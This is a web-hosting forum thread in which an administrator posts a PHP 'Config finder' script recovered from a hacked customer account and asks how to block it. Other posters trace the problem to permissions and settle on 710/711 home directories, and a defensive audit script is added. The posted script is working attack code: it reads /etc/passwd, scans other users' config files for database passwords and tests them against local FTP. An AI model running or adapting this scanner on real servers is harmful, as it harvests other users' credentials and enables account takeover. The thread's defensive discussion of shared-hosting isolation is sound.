Found a scan file from a hacked user that scans user configs with suPHP etc. on

astra

Hi,

We found a scan file from a hacked Joomla customer on one of our servers.

It is a bit strange because the servers run on suPHP / open_basedir on / allow_url_fopen Off / disable_functions exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source.

They scan into /home/$user/public_html/ for

Code:
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='config.backup.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='configuration.php')
or ($file=='wp_config.php')
or ($file=='wp-config.php')
or ($file=='inc.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='index.php')
or ($file=='common.php')
or ($file=='configure.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='dbconnect.inc.php'))

The problem is that lazy customers use the same DB password as their DA login password :confused: and the hackers log in to the user account and start sending spam.

Is there a way to eliminate these scans?

The scan file code:

Code:
<?php
echo '<html><head><title>Config finder</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo '<br><br><textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] ".print_r($users)." Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
read_dir($path,$user);
}
echo "\n[+] Finished\n";
function read_dir($path,$username)
{
if ($handle = opendir($path))
{
while (false !== ($file = readdir($handle)))
{
$fpath = "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr = $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
if (
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='config.backup.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='configuration.php')
or ($file=='wp_config.php')
or ($file=='wp-config.php')
or ($file=='inc.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='index.php')
or ($file=='common.php')
or ($file=='configure.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='dbconnect.inc.php'))
{
$pass = get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link)
{
@$config = fopen($link,'r');
while(!feof($config))
{
$line = fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'password')
or strstr($line,'DB_PASSWORD')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass = str_replace("]=\"","",$pass);
}

else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass = str_replace("]='","",$pass);
return $pass[2];
}
}
}
function ftp_check($login,$pass)
{
@$ftp = ftp_connect('127.0.0.1');
if ($ftp)
{
@$res = ftp_login($ftp,$login,$pass);
if ($res)
{
echo '[FTP] '.$login.':'.$pass." Success !\n";
}
else ftp_quit($ftp);
}
}
echo '</textarea><br><br>scan config files</body></html>';
?>

Thanks for your feedback.
 
That's not the problem, they scan the config files and guess the passwords for the customers' DA login.

I hope someone knows a solution to stop the scanning of config files from other customers in /home/* to guess their password and log in to the control panel.

And yeah, it's pretty stupid of the customers to use the same password for MySQL and DA login, but what can you do about it :o
 
No, but I would suggest removing the script, or at least a big part of it, before script kiddies have a ball with it.
 
Spam apart, do you have any evidence that that scan is really working and checking other users?

Also, have you checked the owner/group of this file? If it isn't root and your permissions are not wrong, maybe that script is not sending other users' configs anywhere because it has no access to them; otherwise, as zeiter said, you have some permission error or misconfiguration.

Regards
 
Yeah, I have copy-pasted the code onto another server and run it via www.domain.com/cp.php, and it scans all the users' config files and passes the passwords back to the cp.php script.

Feel free to test the script yourself and see if it works on your server.

It's strange that this script works, but scripts like c99 shell hack panels etc. do not work under suPHP, and I am glad about that, but I am not happy with this and hope someone knows how to block it.
 
On my server with mod_ruid2 this is the output: [-] Error : coudn`t read /etc/passwd

I suggest you check/reinstall suPHP or switch to mod_ruid2

Regards
 
I doubt your /etc/passwd can't be read because of suPHP/mod_ruid2; that must be caused by the open_basedir restriction.

What are your permissions on /etc/passwd?
 
Oh, right.

The passwd file is 644

Code:
>ll /etc/passwd
-rw-r--r-- 1 root root 7,1K  9 ago 11:54 /etc/passwd

I can confirm that without open_basedir this script works, but it just found one user's data out of 120...

Actually the only user found had public_html at 755; setting it to 711 made it impossible to view inside, and the script is unable to find any users.

Thanks zeiter for the tip.

astra, check that your public_html folders are 711

Regards
 
With group access homedirs /home/username should be 710 and it should not really matter what permissions are set on public_html if you're using mod_ruid/suPHP.
 
Oh, right again, that user didn't have 710 on /home/username...

But setting 710 on public_html should be a slightly more useful step for security, or do you think it would cause problems?

Regards
 
It depends on who the owner of public_html is. If your public_html belongs to username:username, then Apache should still have access into it, and in this case it should be 755. If your public_html belongs to username:access, then 750 or 710 would be enough, I think.
 
I've checked that; public_html is owned by user:user and has 710 permissions, and the website seems to be working correctly, so it should be OK to keep 710 on public_html too, I think.

Regards
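As an added example (not code from any poster in this thread), a small audit that reports /home/<user> and public_html directories that another local user can still list, which is the condition the scan above depends on and the 710 / 711 settings discussed here remove. The sample home tree it builds under mktemp is constructed for the demo; on a real box you would call audit_homes /home.

```shell
#!/bin/sh
# Report home and public_html directories whose "other" bits include read (o+r):
# any local user, including a hacked customer account, can list such a directory.
# Output: one line per offending directory, "<octal mode> <path>".
audit_homes() {
  base="$1"
  for home in "$base"/*; do
    [ -d "$home" ] || continue
    for d in "$home" "$home/public_html"; do
      [ -d "$d" ] || continue
      # GNU stat first, BSD stat as fallback
      mode=$(stat -c '%a' "$d" 2>/dev/null || stat -f '%Lp' "$d")
      other=$(printf '%s' "$mode" | tail -c 1)   # last digit = "other" bits
      if [ $((other & 4)) -ne 0 ]; then
        printf '%s %s\n' "$mode" "$d"
      fi
    done
  done
}

# Constructed sample tree (hypothetical users alice and bob) for a stand-alone run:
# alice keeps the default 755, bob has the 710 home / 711 public_html from the thread.
make_demo_tree() {
  root=$(mktemp -d)
  mkdir -p "$root/alice/public_html" "$root/bob/public_html"
  chmod 755 "$root/alice" "$root/alice/public_html"
  chmod 710 "$root/bob"
  chmod 711 "$root/bob/public_html"
  printf '%s' "$root"
}

demo=$(make_demo_tree)
audit_homes "$demo"   # lists alice's two 755 directories, nothing for bob
rm -rf "$demo"
```

A 711 public_html still lets Apache traverse into it by path, which is why the scan's readdir fails while the site keeps working; a 750/710 directory additionally needs the web server in the group, as the replies above note.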
 
Note, you're using mod_ruid, and all Apache requests should be done as username, not Apache, not group access. But the topic starter is still using mod_suphp, and so am I.
 